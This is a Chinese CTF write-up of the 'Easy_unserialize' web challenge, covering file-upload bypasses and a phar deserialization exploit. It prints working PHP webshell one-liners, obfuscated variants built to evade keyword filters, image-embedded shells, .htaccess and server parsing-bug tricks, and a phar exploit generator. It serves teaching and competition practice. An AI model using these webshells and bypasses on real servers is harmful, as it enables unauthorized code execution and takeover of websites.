文章目录:
- 一.Easy_unserialize题目描述
- 二.作者解题思路及总结 1.一句话和冰蝎蚁剑 2.图片一句话 3.过狗一句话绕过限制 4.BurpSuite文件上传漏洞的常用方法
- 三.WP解题思路
- 四.总结
作者的github资源:
- 逆向分析:https://github.com/eastmountyxz/ SystemSecurity-ReverseAnalysis
- 网络安全:https://github.com/eastmountyxz/ NetworkSecuritySelf-study
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。网站目前可以访问,后续应该会关闭,初学者可以试试,但切勿破坏。
一.Easy_unserialize描述
考点: 反序列化 文件上传
主界面显示如下图所示:
其中,upload上传文件, view查看已上传的图片。
上传文件代码如下:
代码语言:javascript复制<form action="upload.php" method="post" accept-charset="utf-8" enctype="multipart/form-data">
<label name="title" for="file">图片: </label>
<input type="file" name="file" id="file">
<input type="submit" class="button" name="submit" value="上传">
</form>
二.作者解题思路及总结
这道题目有点遗憾没有完成,题目虽然叫“Easy_unserialize”,但我的第一想法是文件上传漏洞,也尝试了很多方法都未成功。下面我将分别从我的解题思路和WP思路进行讲解,希望对您有所帮助~
1.一句话和冰蝎蚁剑
(1) “一句话木马”服务端 服务端一句话是指本地存储的脚本木马文件,是我们要用来将恶意代码上传到服务器网站中执行权限。该语句触发后,接收入侵者通过客户端提交的数据,执行并完成相应的操作。PHP常用一句话木马的代码如下:
代码语言:javascript复制//http://localhost/easy_unserialize/ma01.php
<?php eval($_POST[whuctf]); ?>
//http://localhost/easy_unserialize/ma02.php
<?php assert($_POST[whuctf]); ?>
(2) 中国蚁剑反弹shell 通过中国蚁剑连接“ma01.php”文件,其代码为一句话木马“<?php eval($_POST[whuctf]); ?>”;然后再蚁剑空白处右键“添加”,设置URL地址及连接密码“whuctf”。
连接成功后成功获取目标网站的服务器文件目录,如下图所示:
(3) 冰蝎反弹shell 冰蝎作为新款的webshell连接工具,使用效果非常好。其基本使用方法如下图所示:
连接URL和密码并反弹shell。
下载地址:
- https://github.com/rebeyond/Behinder
2.图片一句话
(1) 题目分析 由于该题只能上传图片文件,我们想到的是图片一句话木马。针对该网站,如果我们直接上传“ma01.php”文件它会提示“You can’t upload this kind of file!”错误,这是因为它指定了图片文件格式。
而当我们上传图片“mm.jpg”时,它就能成功上传,并且查看图片如下图所示:
(2) 网站内容检查 内容检查是网站安全的重要手段之一。假设我们将包含一句话木马的“fox.php”修改为“1.jpg”并上传,有的网址会提示上传错误,因为JPG格式不能执行PHP文件脚本的。
代码语言:javascript复制<?php eval($_POST[fox]); ?>
如下图所示,它会判断图片的文件头,包括gif、png、jpg等格式。
文件头是用来判断数据格式的,这里尝试修改文件头进行上传,以gif文件为例,添加文件头“GIF89a”后即可上传成功。
同样可以尝试BurpSuite抓包修改文件后缀.php进行上传,后面会详细讲解。
(3) 暂定解题思路 由于该题有检测文件的content-type,我们可以准备一张很小的图片,比如画图中新建一个像素的jpg,然后往里面添加shell到图片尾部。同时,该题仅检测文件头,而没检测图片是否能正常使用,所以图片几十个字节也够用。
接下来还需要让网站按PHP后缀来解析,这又涉及到解析漏洞。比如IIS的服务器会把诸如1.asp;1.jpg以asp来解析,虽然后缀本质是jpg;旧版的Apache可以上传1.php.xxx文件,只要xxx对容器来说不是动态脚本不能解析,它就会往左边逐个解析,直到遇到php就解析了;还有旧版的Ngnix可以上传shell.jpg,然后访问shell.jpg/1.php或者shell.jpg .php都可以用php来解析jpg文件。这些都是需要用到网站容器、系统、环境的缺陷或者漏洞。
(4) 图片一句话木马制作 某些网站上传文件时,会检查你上传文件的头目录,如果你的一句话木马是放在PHP文件中,它很容易被识别出来。这个时候图片一句话木马的作用就体现出来了。在CMD中直接运行,如下图所示,它是在mm.jpg图片中插入mm01.php中的一句话木马 “<?php eval($_POST[whuctf]); ?>” ,并存储为mm-ma01.jpg图片,其中b表示二进制,a表示ascii编码。
代码语言:javascript复制copy mm.jpg/b ma01.php/a mm-ma01.jpg
用Notepad 打开“mm-ma01.jpg”可以看到,里面包含了一句话木马,并且不影响我们的图片质量。
此时我们上传包含一句话木马的“mm-ma01.jpg”文件,但提示错误:You could not upload this image because of some dangerous code in your file!,这是因为它检查了“eval”关键词。
3.过狗一句话绕过限制
上面说明对某些关键字有限制,我们需要对一句话木马进行绕过处理,下面我总结了常见的一些方法:
代码语言:javascript复制//通过变量赋值
<?php $a='b'; $$a='assert'; $b($_POST[shell]); ?>
<?php $a = "eval"; $a(@$_POST['shell']); ?>
//通过str_replace函数替换
<?php $a=str_replace("Waldo", "", "eWaldoval"); $a(@$_POST['shell']); ?>
//通过base64_decode函数编码
<?php $a=base64_decode("ZXZhbA=="); $a($_POST['shell']);?>
//通过字符串拼接
<?php $a="e"."v"; $b="a"."l"; $c=$a.$b; $c($_POST['shell']); ?>
//利用parse_str函数
<?php $str="a=eval"; parse_str($str); $a($_POST['shell']); ?>
//使用脚本
<script language="PHP"> @eval($_POST['shell']); </script>
//创建shell.php文件
<?php fputs(fopen('shell.php','w'),'<?php assert($_POST[whuctf]);?>'); ?>
//使用一句话木马时可以在函数前加”@”符 让php语句不显示错误信息从而增加隐蔽性
下面是我进一步制作的图片一句话木马。
遗憾的是,虽然图片都能成功上传,但中国蚁剑和冰蝎都无法连接成功。
同时,发现只要增加文件头如“GIF89a”,就能够绕过该网站上传图片的限制。
代码语言:javascript复制GIF89a
<?php assert($_POST[whuctf]); ?>
如果是本地上传“gif-ma01.php”文件,就能够成功反弹shell,如下图所示。
但该网站会提示“You can’t upload this kind of file!”,因为它对上传的后缀名有校验(从而拦截gif-ma01.php),而如果修改后缀为“gif-ma01.gif”,则能够成功上传。
查看该gif图片显示如下图所示:
但是中国蚁剑、冰蝎等仍然无法连接,接着怎么办呢?
分析原因: 这是因为部分网站是有文件格式解析的,即网站会判断上传的脚本是否可以被执行,某些文件格式是无法被解析的,即上传的jpggif格式文件无法被php格式解析。这也是为什么有的图片一句话木马不能访问,其实和网站环境相关,也涉及到解析漏洞,需要让所上传的文件按php格式解析才能运行。
4.BurpSuite文件上传漏洞的常用方法
接下来作者想通过BurpSuite拦截上传的文件,对其格式进行修改,看看能否上传并按照期待的php文件格式解析。下面详细介绍文件上传漏洞的各种方法,希望能帮助到您。
方法1:JS绕过文件上传 有的网站会通过客户端JS验证本地上传文件,所以如果你上传一个不正确的文件格式,它的判断会很快显示出来你上传的文件类型不正确。我们可以删除文件上传校验函数,如代码onsubmit="return checkFile()"中的checkFile()。
比如,上传其他文件会有相关的错误提示。
或者尝试在允许上传格式的文件里添加.php格式。
失败: 因为该题没有本地校验,并且当前无法看到上传校验的代码。
方法2:上传允许上传的文件,再用BurpSuite进行抓包改包 比如,首先上传一个规则的文件“gif-ma01.gif”,再用BurpSuite抓包修改为“gif-ma01.php”。
失败: 提示必须要上传图片格式“You can’t upload this kind of file!”。
方法3:MIME绕过文件上传 MIME(Multipurpose Internet Mail Extensions)多用于互联网邮件扩展类型,是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式。
核心作用:服务器判断你上传的是什么文件。其基本类型比如:
- {".3gp", “video/3gpp” }
- {".asp", “application/x-asap” }
- {".avi", “video/x-msvideo” }
- {".bmp", “image/bmp” }
- {".cpp", “text/plain” }
- {".jpe", “image/jpeg” }
- {".mp4", “video/mp4” }
- …
本题显示的是图片格式,下面是使用BurpSuite抓取所上传的JPG文件和PHP文件的类型对比。
某些情况会限制上传文件的类型,此时也需要修改“Content-Type”类型。比如将上传的PHP文件Content-Type修改为“image/gif”。
失败: 简单修改后缀名或content-type均无法实现,提示必须要上传图片格式“You can’t upload this kind of file!”。
方法4:扩展名限制绕过
① 大小写、双写绕过文件上传 大小写是把文件扩展名进行php测试绕过。如“1.php”文件上传会被拦截,而修改成“1.phP”后成功上传。双写则为“phphpp”等格式。
② 点、空格绕过文件上传 在文件后缀上添加空格重新命名,会自动删除所谓的空格,点同理会自动删除的,因为可能尝试欺骗服务器验证。系统默认是不支持加空格、加点的,比如“.php空格”会自动解析为“.php”,“.php.”会自动解析为“.php”。比如使用BurpSuite抓包进行操作,如下图所示,将上传的“.php”文件后增加一个空格,再点击Forward进行上传。
③ htaccess文件绕过上传 .htaccess文件或者“分布式配置文件”提供了针对每个目录改变配置的方法,即在一个特定的目录中放置一个包含指令的文件,其中的指令作用于此目录及其所有子目录。简单来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。它的功能有:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或目录的访问、禁止目录列表、配置默认文档等。这里我们需要用到的是改变文件扩展名,代码如下:
代码语言:javascript复制<FilesMatch "eastmount">
SetHandler application/x-httpd-php
</FilesMatch>
接着它会把fox名字的文件全都以php来运行,需要特殊文件进行创建,如Notepad 。首先上传一个“.htaccess”文件,再上传一个“fox.jpg”文件,它会将这张图片以php来解析。
显示如下图所示,因为是以php格式解析的,而不显示成一张jpg图片。
接着打开中国菜刀,获取了该服务器的目录。
显示的两个文件如下图所示:包括 “fox.jpg” 和 “.htaccess”。
④ PHP345文件绕过上传 PHP3代表PHP版本3,这里用于文件绕过检测。一般的软件都是向下兼容,PHP3代码,PHP5同样兼容能够执行。如下图所示,fox.php5文件同样能够正常上传。
⑤ Windows ::DATA绕过Windows ::DATA绕过只能用于Windows,Windows下NTFS文件系统有一个特性,即NTFS文件系统在存储数据流的一个属性DATA时,是请求a.php本身的数据。如果a.php还包含了其他的数据流,比如a.php:lake2.php,请求a.php:lake2.php::DATA,则是请求a.php中的流数据lake2.php的流数据内容。简单来说,就是在数据后面加上::DATA实现绕过,fox.php::
⑥ Apache解析漏洞上传 Apache是从右到左判断解析,如果为不可识别解析,就再往左判断。比如1.php.xxx对Apache来说xxx是不可解析的,所以就会解析成1.php,这就是该漏洞的实现原理。
如上图所示,将本地“fox.php”修改为“fox.php.xxx”,然后点击上传。
接着尝试用菜刀去连接。URL为靶场的网址,密码为PHP一句话木马中的“fox”,代码如下:
代码语言:javascript复制<?php eval($_POST[fox]); ?>
下图是Caidao连接的示意图。
连接之后,成功获取文件目录,可以看到“fox.php.xxx”被成功上传。
本题能够成功上传“gif-ma01.php.xxxgif”文件,如下图所示,难道成功了吗?
然而当使用中国蚁剑和冰蝎去连接时仍然失败,说明该网站不存在Apache解析漏洞。
失败: 这道题目不会让你上传“.htaccess”文件,同时也不会让你简单绕过上传,不存在Apache等漏洞。
方法5: 截断上传 0x00是十六进制表示方法,是ASCII码为0的字符,在有些函数处理时,会把这个字符当做结束符。这个可以用在对文件类型名的绕过上。需要注意,00截断get是可以自动转换的,post需要特殊转换,下面举一个例子。
首先,选择上传一张包含一句话木马的“php.jpg”图片。
然后,利用BurpSuite抓包并修改后缀名为“php.php 1.jpg”。如果直接修改为“php.php”可能会被过滤。
这种方法仍然不可行,因为它采用post提交数据,需要特殊转换。这里选中“ ”右键转换为URL格式,如下图所示,然后再点击“Forward”提交数据即可。
文件成功上传, 自动截断后面的内容。
本题我也进行了尝试,上传包含一句话木马的图片文件“gif-ma02.gif”,然后利用BurpSuite抓包并修改后缀名为“gif-ma02.php 1.gif”。
失败: 非常遗憾,系统识别出来,并且扔给我一个“Hacker!”,真让人哭笑不得,还是太菜。
方法6:特色版本漏洞
① IIS6.0 解析漏洞
- 目录解析 以“*.asp”命名的文件夹里的文件都将会被当成ASP文件执行,比如“1.asp/1.jpg”,这里1.jpg会被当做asp文件执行。
- 文件解析 “*.asp;.jpg”像这种畸形文件名在 “;” 后面的直接被忽略,也就是说当成 “*.asp”文件执行。比如“1.asp;1.jpg”命名的文件,同样是以asp脚本进行执行。
利用IIS6.0解析漏洞,我们可以在网站下建立名字为“*.asp” 、“*.asa”的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析。例如创建目录“vidun.asp”,则“/vidun.asp/1.jpg”将被当作asp文件来执行。如下图所示,尝试在左边“upfile/”文件路径名后面增加文件名称“1.asp;”,然后点击请求发送。右边会显示文件成功上传,其路径详见图中。
上传之后的文件可以成功访问,如下图所示,然后Caidao连接即可。
② 编辑器漏洞 编辑器属于第三方软件,它的作用是方便网站管理员上传或编辑网站上的内容,类似我们电脑上的Word文档。常用编辑器包括FCKeditor、EWEbeditor、CKFinder、UEDITOR等。
FCKeditor编辑器漏洞利用 在高版本fck中,直接上传或抓包修改文件名“a.asp;.jpg”,都会将前面的点变成下划线,也就是变成“a_asp;.jpg”,这样我们的文件名解析就无效果了。绕过方法是突破建立文件夹,其实质是利用我们IIS6.0的目录解析。
假设路径为“/fckeditor/editor/filemanager/connectors/test.html”,文件名中包含“fck”,可以直接判定为FCK编辑器。在FCKeditor中选中“a.asp;.png”并成功上传,如下图所示。
打开服务器,可以看到成功上传的图片文件。它名字被修改为“a_asp;.png”,这就是FCK高版本的过滤,它将“.”修改为“_”。
eWebEditor编辑器漏洞 eWeb编辑器需要登录后台,其默认数据库地址是:ewebeditor/db/ewebeditor.mdb,利用eweb遍历漏洞遍历文件目录、查看整个网站结构及敏感信息,比如:ewebeditor/admin_uploadfile.asp?id=14&dir=./。
③ IIS高版本上传–畸形解析漏洞 前面讲述的IIS6.0毕竟是一个低版本,除了靶场和僵尸站很少能够遇到。下面讲解高版本漏洞。
- 畸形解析漏洞影响版本 IIS7、IIS7.5、Nginx<0.8.03
- 漏洞产生条件 开启Fast-CGI或php配置文件中cgi.fix_pathinfo。
- 漏洞产生原因 其漏洞不是IIS本身的问题,而是PHP配置不当造成的问题,根本原因是开启了cgi.fix_pathinfo选项。由于该漏洞是php配置造成,并且默认开启该功能,所以它影响了IIS7、IIS7.5、IIS8.5等多个版本,凡是IIS PHP都有可能会有这个漏洞。
- 漏洞利用方法 当我们上传一张名为“1.jpg”的图片文件,并且这张图片文件里包含以下代码。那么它会生成一个叫shell.php的脚本文件,并写入我们的一句话,密码为cmd。而一句话的位置是:上传的图片文件名字“/shell.php”。如果图片没有被改名,那么现在我们的一句话文件在“1.jpg/shell.php”中。
<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>'); ?>
接着我们演示另一个代码,将“1.jpg”内容修改如下,直接写入shell。
代码语言:javascript复制<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>'); ?>
访问“/1.jpg/shell.php”显示的内容为空。
但是此时会在服务器生成一个名为“shell.php”的文件,如下图所示:
并且“shell.php”包含了我们的一句话木马,这样通过Caidao即可访问该页面,并获取服务器的文件目录。
使用该方法我们尝试插入一句话木马,很幸运我们的图片是成功上传了。
但遗憾的是,并没有生成shell.php文件,并且提示:
- The requested URL /upload/0835ddbdeff6aa 08c9b7804a24dc203e/gif-ma04.gif/shell.php was not found on this server.
④ aspx漏洞 aspx它有一个“web.config”的配置文件,它规定我们上传文件的后缀。
我们可以自定一个后缀名来解析aspx文件。
换句话说,当我们遇到可以上传配置文件的时候,则上传我们修改好的配置文件,然后自定义一个后缀名如“.ad”,从而绕过WAF或检测,上传成功之后它会解析成aspx并执行。如下图所示:
所以,当我们遇到可以上传配置文件的时候,通过该方法实现绕过,从而提权。
失败: 非常遗憾,我们通过下面的代码也没有成功。
代码语言:javascript复制<?php fputs(fopen('shell.php','w'),'<?php @assert($_POST[whuctf]); ?>'); ?>
哎,尝试了很多方法都没成功,自己还是太菜了!但希望这部分文件上传漏洞和一句话木马的总结希望您喜欢。大家有好的解决方法也可以告知我,接下来我们回到题目“easy_unserialize”,那可能需要反序列化解决。
三.WP解题思路
下面我分享52hertz大佬的解题思路,并结合自己的经验总结。本题考查的上传phar触发反序列化,同时参考创宇404实验室的文章。
(1) 通过分析主页源码,发现upload和view两个对话框包括关键字段name=“acti0n”,抓包可以看到?acti0n=upload的访问方式,这是一个文件包含的漏洞点。
(2) 通过设置“acti0n”参数和filter过滤访问upload.php和view.php页面,同时进行base64大写过滤。
- ?acti0n=php://filter/ convert.basE64-encode/resource=upload.php
- ?acti0n=php://filter/ convert.basE64-encode/resource=view.php
推荐作者上一篇文章的文件包含漏洞 文件包含漏洞是指通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。当php://filter与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行,从而导致任意文件读取。
upload.php在线base64解码如下所示,没有什么利用的点。
代码语言:javascript复制<!DOCTYPE html>
<link type = "text/css" rel = "stylesheet" href = "css/style.css">
<html lang = "zh">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>上传图片</title>
</head>
<body>
<script type = "text/javascript" color = "0,0,255" opacity = '0.7' zIndex = "-2" count = "99" src = 'js/canvas-nest.min.js'></script> <!-- 动态背景 -->
<br><br><br>
<h2>上传你手里最好的图片!</h2>
<p id = "comment">If it is excellent enough, you will get the flag!</p>
<br><br><br>
<div class = "form1">
<form action = "upload.php" method = "post" accept-charset = "utf-8" enctype = "multipart/form-data">
<label name = "title" for = "file">图片: </label>
<input type = "file" name = "file" id = "file">
<input type = "submit" class = "button" name = "submit" value = "上传">
</form>
</div>
</body>
</html>
<?php
error_reporting(0);
$dir = 'upload/'.md5($_SERVER['REMOTE_ADDR']).'/';
if(!is_dir($dir)) {
if(!mkdir($dir, 0777, true)) {
echo error_get_last()['message'];
die('Failed to make the directory');
}
}
chdir($dir);
if(isset($_POST['submit'])) {
$name = $_FILES['file']['name'];
$tmp_name = $_FILES['file']['tmp_name'];
$ans = exif_imagetype($tmp_name);
if($_FILES['file']['size'] >= 204800) {
die('filesize too big.');
}
if(!$name) {
die('filename can not be empty!');
}
if(preg_match('/(htaccess)|(user)|(..)|(%)|(#)/i', $name) !== 0) {
die('Hacker!');
}
if(($ans != IMAGETYPE_GIF) && ($ans != IMAGETYPE_JPEG) && ($ans != IMAGETYPE_PNG)) {
$type = $_FILES['file']['type'];
if($type == 'image/gif' or $type == 'image/jpg' or $type == 'image/png' or $type == 'image/jpeg') {
echo "<p align="center">Don't cheat me with Content-Type!</p>";
}
echo("<p align="center">You can't upload this kind of file!</p>");
exit;
}
$content = file_get_contents($tmp_name);
if(preg_match('/(scandir)|(end)|(implode)|(eval)|(system)|(passthru)|(exec)|(chroot)|(chgrp)|(chown)|(shell_exec)|(proc_open)|(proc_get_status)|(ini_alter)|(ini_set)|(ini_restore)|(dl)|(pfsockopen)|(symlink)|(popen)|(putenv)|(syslog)|(readlink)|(stream_socket_server)|(error_log)/i', $content) !== 0) {
echo('<script>alert("You could not upload this image because of some dangerous code in your file!")</script>');
exit;
}
$extension = substr($name, strrpos($name, ".") 1);
if(preg_match('/(png)|(jpg)|(jpeg)|(phar)|(gif)|(txt)|(md)|(exe)/i', $extension) === 0) {
die("<p align="center">You can't upload this kind of file!</p>");
}
$upload_file = $name;
move_uploaded_file($tmp_name, $upload_file);
if(file_exists($name)) {
echo "<p align="center">Your file $name has been uploaded.<br></p>";
} else {
echo '<script>alert("上传失败")</script>';
}
echo "<p align="center"><a href="view.php" >点我去看上传的文件</a></p>";
#header("refresh:3;url=index.php");
}
?>
访问view.php页面如下图所示:
view.php在线base64解码如下所示:
代码语言:javascript复制<!DOCTYPE html>
<html lang="zh">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>查看图片</title>
<link type = "text/css" rel = "stylesheet" href = "css/style.css">
</head>
<body>
<script type = "text/javascript" color = "0,0,255" opacity = '0.7' zIndex = "-2" count = "99" src = 'js/canvas-nest.min.js'></script> <!-- 动态背景 -->
<?php
#include_once "flag.php";
error_reporting(0);
class View
{
public $dir;
private $cmd;
function __construct()
{
$this->dir = 'upload/'.md5($_SERVER['REMOTE_ADDR']).'/';
$this->cmd = 'echo "<div style="text-align: center;position: absolute;left: 0;bottom: 0;width: 100%;height: 30px;">Powered by: xxx</div>";';
if(!is_dir($this->dir)) {
mkdir($this->dir, 0777, true);
}
}
function get_file_list() {
$file = scandir('.');
return $file;
}
function show_file_list() {
$file = $this->get_file_list();
for ($i = 2; $i < sizeof($file); $i ) {
echo "<p align="center" style="font-weight: bold;">[".strval($i - 1)."] $file[$i] </p>";
}
}
function show_img($file_name) {
$name = $file_name;
$width = getimagesize($name)[0];
$height = getimagesize($name)[1];
$times = $width / 200;
$width /= $times;
$height /= $times;
$template = "<img style="clear: both;display: block;margin: auto;" src="$this->dir$name" alt="$file_name" width = "$width" height = "$height">";
echo $template;
}
function delete_img($file_name) {
$name = $file_name;
if (file_exists($name)) {
@unlink($name);
if(!file_exists($name)) {
echo "<p align="center" style="font-weight: bold;">成功删除! 3s后跳转</p>";
header("refresh:3;url=view.php");
} else {
echo "Can not delete!";
exit;
}
} else {
echo "<p align="center" style="font-weight: bold;">找不到这个文件! </p>";
}
}
function __destruct() {
eval($this->cmd);
}
}
$ins = new View();
chdir($ins->dir);
echo "<h3>当前目录为 " . $ins->dir . "</h3>";
$ins->show_file_list();
if (isset($_POST['show'])) {
$file_name = $_POST['show'];
$ins->show_img($file_name);
}
if (isset($_POST['delete'])) {
$file_name = $_POST['delete'];
$ins->delete_img($file_name);
}
unset($ins);
?>
</body>
</html>
(3) 简单的审计一下两份功能代码,upload.php中没有什么利用点,就是上传文件与拦截过滤了一些危险函数。关键点在view.php中,view.php里面有很显然的eval(),只要修改类中的私有变量$cmd就可以拿到shell。
这里有一个file_exists函数可以利用,而且最后还会进行代码执行。请参考 创宇404实验室 的文章(详见后参考文献),利用phar反序列化漏洞进行攻击,该方法在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以不依赖unserialize()直接进行反序列化操作。这让一些看起来“人畜无害”的函数变得“暗藏杀机”,这里利用的就是file_exists函数触发该漏洞。
(4) 我们看到upload.php中的黑名单如下,想办法用show_source()函数读取flag.php文件,而且phar可以直接上传。
- if(preg_match(’/(scandir)|(end)|(implode)|(eval)|(system)|(passthru)|(exec)|(chroot)|(chgrp)|(chown)|(shell_exec)|(proc_open)|(proc_get_status)|(ini_alter)|(ini_set)|(ini_restore)|(dl)|(pfsockopen)|(symlink)|(popen)|(putenv)|(syslog)|(readlink)|(stream_socket_server)|(error_log)/i’, $content) !== 0) { echo(’< script>alert(“You could not upload this image because of some dangerous code in your file!”)</ script>’);
构造的exp模板代码如下,并且增加绕过gif文件头的限制。
代码语言:javascript复制<?php
class View
{
public $dir;
private $cmd;
function __construct()
{
$this->cmd = 'show_source("flag.php");';
}
function __destruct() {
eval($this->cmd);
}
}
$phar = new Phar('phar.phar');
$phar -> startBuffering();
$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>'); //设置stub 增加gif文件头
$phar ->addFromString('test.txt','test'); //添加要压缩的文件
$object = new View();
$phar -> setMetadata($object); //将自定义meta-data存入manifest
$phar -> stopBuffering();
?>
(5) 本地运行上面的exp.php文件会生成phar文件,然后直接上传。 注意:要将php.ini中的phar.readonly选项设置为Off,否则无法生成phar文件,并报错。
生成的phar.phar文件如下图所示:
(6) 文件上传成功之后,通过delete这个参数来触发file_exists才可以利用phar,因此构造参数 detele=phar://phar.phar 包含一下,再发送post命令即可。
注意,居然能上传phar文件,如果不知道该知识点或获取upload.php及view.php源码,还真不一定能成功。同时,在上传类型文件检测时,是通过添加GIF89a绕过的。
最终获得flag值为WHUCTF{Phar_1s_Very_d@nger0u5}。同时,还有许多函数都可以触发phar,getimagesize同样可以触发;而文件后缀也不一定要是phar, 只要使用phar协议就可以。
Wordpress是网络上最广泛使用的CMS,它也存在这个漏洞,并且该漏洞在2017年2月份就报告给了官方,但至今仍未修补。之前的任意文件删除漏洞也是出现在这部分代码中,同样没有修补,如下图所示wpnonce值可在修改页面中获取。具体过程请参考404实验室。
四.总结
写到这里,这篇文章就介绍完毕,详细讲解了文件上传漏洞和一句话,最后的解决方法也是我没有想到的,希望对您有所帮助。
学安全近一年,认识了很多安全大佬和朋友,希望大家一起进步。这篇文章中如果存在一些不足,还请海涵。作者作为网络安全初学者的慢慢成长路吧!希望未来能更透彻撰写相关文章。同时非常感谢参考文献中的安全大佬们的文章分享,感谢师傅们的教导。
深知自己很菜,得努力前行。2020年5月第一次参加CTF比赛写的。这半年来,原创博客越来越少,希望自己能在博士路上不断前行,多读论文,多写论文,多学新知识。加油!也祝所有在读博士都学有所成,勿忘来时的路,砥砺前行。最后还是那句话,人生路上,好好享受陪伴家人的日子,爱你们~
- 一.Easy_unserialize题目描述
- 二.作者解题思路及总结 1.一句话和冰蝎蚁剑 2.图片一句话 3.过狗一句话绕过限制 4.BurpSuite文件上传漏洞的常用方法
- 三.WP解题思路
- 四.总结
CTF初学者个人建议:
- 多做CTF题目,多参加CTF比赛,多交流经验
- CTF题目推荐BUUCTF,比赛每个月都有很多,大赛小赛,比如XCTF、KCTF、WCTF等
- 每个优秀的CTF选手都有自己的工具库、脚本库、词典库
- 多向优秀的安全团队学习,关注他们的公众号,甚至加好友,组队比赛
- CTF比赛对找工作有帮助,但后续建议和漏洞挖掘实际工作结合起来